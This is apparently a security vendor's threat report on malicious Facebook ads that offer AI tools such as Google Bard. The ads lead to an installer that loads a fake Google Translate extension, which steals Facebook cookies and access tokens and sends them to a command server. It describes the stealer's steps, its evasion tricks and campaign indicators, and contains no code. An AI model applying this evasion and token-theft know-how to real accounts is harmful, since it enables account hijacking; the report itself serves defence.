Large language models (LLMs) are currently a hot topic nowadays, drawing much attention as the emergence of general artificial intelligence seems to near. Early adopters will have a strong competitive advantage, including creative industries like marketing, copywriting, and data analysis and processing. However, the adoption of AI technologies also opens opportunities for cybercriminals who want to capitalize on the growing interest in LLMs.
In this blog entry, we discuss how a threat actor abuses paid Facebook promotions featuring LLMs to spread malicious code, with the goal of installing a malicious browser add-on and stealing victims’ credentials. The threat actor uses URL shorteners like rebrand.ly for URL link redirection, Google sites for web hosting, and cloud storages like Google Drive and Dropbox to host the malicious file.
We shared our findings with Meta, who tracked this particular threat actor and TTPs and now removed the fraudulent pages and ads we reported. Meta has shared that it will continue to strengthen its detection systems to find similar fraudulent ads and pages using insights from both internal and external threat research. Additionally, Meta recently shared updates about its efforts in protecting businesses that malware might target across the internet and recommending tips to help users stay safe.
Infection vector
The threat actor uses Facebook’s paid promotion to lure potential victims with advertisements that feature fake profiles of marketing companies or departments. Telltale signs of these fake profiles include purchased or bot followers, fake reviews by other hijacked or inauthentic profiles, and a limited online history.
These advertisements promise to boost productivity, increase reach and revenue, or assist in teaching, all with the help of AI. Some lures promise to provide access to Google Bard (Figures 1 and 2), a conversational AI chatbot that is unavailable in the European Union (EU) at the time of writing.
In other cases, the threat actor claimed to provide access to "Meta AI,” as shown in Figure 4.
Once the user selects the link in the advertisement, they are redirected to a simple website that lists the advantages of using LLM. It also contains a link for downloading the actual "AI package," as shown in Figure 5.
To avoid antivirus detection, the threat actor distributes the package as an encrypted archive with simple passwords like "999" or "888". The archive is usually hosted on cloud storage sites like Google Drive or Dropbox.
Analysis of the package
The archive, once opened and decrypted with the correct password, usually contains a single MSI installer file. When the victim executes the installer, the installation process (Figure 6) drops a few files belonging to a Chrome extension, including background.js, content.js, favicon.png, and manifest.json (Figure 7). It then runs a batch script to kill the currently running browser and restarts it, this time loaded with a malicious extension that impersonates Google Translate (Figures 8 and 9).
Analysis of the malicious extension
The main logic of the malicious extension can be found in the extension service worker script. After deobfuscation, we can analyze its stealing capabilities. First, the script attempts to steal Facebook cookies. It specifically checks for the presence of c_user cookie, which stores a unique user ID (Figure 10). If c_user cookie does not exist, the stealer does not continue.
It then proceeds to stealing the access token and using it to request additional information from Facebook’s GraphQL (Figure 11).
Having stolen the access token, the script can query Facebook’s GraphQL API for additional information. The first GraphQL query enumerates the account’s managed pages and information about them, like its business ID, fan count, what tasks the account can perform (analyze, advertise, messaging, moderate, create content, manage), and its verification status.
The second GraphQL query enumerates the account’s business information, like its ID, verification status, the ability to create ad account, sharing eligibility status, and the account creation time.
The last GraphQL query enumerates the account’s advertisement information, like its ID, account status (whether it’s “live”, “disabled”, “unsettled”, “in grace period”, or “closed”), currency, whether it’s prepaid, its ads payment cycle, daily spending limit, amount already spent, account balance, and the account creation time.
The stealer also attempts to get the victim’s IP address. All the stolen information — the aforementioned Facebook cookies, access token, browser’s user agent, managed pages, business account information, and advertisement account information — are concatenated, URL-encoded, base64-encoded, and exfiltrated to a command-and-control C&C server (Figure 12).
We noticed a short string being appended to the nave variable, which contains a web browser’s user agent string. This string differs from different samples; we posit that this is some kind of campaign ID that helps the threat actor identify how a particular victim was infected. The campaign gbard-ai[.]info ID usually starts with a star symbol (*) and ends with a pipe symbol (|), as shown in Figure 13.
During this research, we observed the following campaign IDs:
- *fb|
- *gs2|
- *gs4|
- *gv4|
- *s2|
- *ss8|
- *tu1|
- *v8|
- *v9|
- *voi2|
- *voi4|
Threat actor background
Within the malicious script, we noticed several keywords and variables in Vietnamese (Figures 14 and 15), suggesting that the threat actor speaks or at least understands Vietnamese.
Conclusion and Security Recommendations
Our research suggests that the threat actor’s main goal is to target and infect business social networking managers or administrators and marketing specialists (who are often also administrators of a company’s social networking sites). As supporting evidence, we observed that the same tracker ID reappears on multiple websites with domain names that contain words like “gooogle – bard”, “gbard”, and “adds -manager -meta”.
In one case, one of the authors of this research helped with the incident response of a specific victim and observed that the threat actor had added suspicious users to the victim’s Meta Business Manager. They also used the victim’s prepaid promotion budget to promote the threat actor’s own content. To date, the threat actor has not tried to contact this victim. According to Facebook’s research, malware and threat actors have historically been motivated primarily by account theft as opposed to extortion.
An antivirus solution with web reputation services is a good countermeasure to threats like the one described in this blog entry. Users should always scan the files they download from the internet and stay vigilant against threat actors who might abuse the hype surrounding new developments in artificial intelligence. The best protection against this kind of attack is always awareness, so potential targets of this threat actor should be wary of the following red flags:
- A “hot shot” look and feel to the landing site that contains the link to the malicious file
- Promise of access to Google Bard even though its availability is limited in certain countries
- The offered service appearing good to be true, as official access to LLMs and systems based on these is expensive and/or limited
- Any inconsistency in the wording and appearance of promotional posts by the threat actor
- A broadly available yet password-protected file offered on the landing site
Indicators of Compromise (IOCs)
The IOCs for this article can be found here.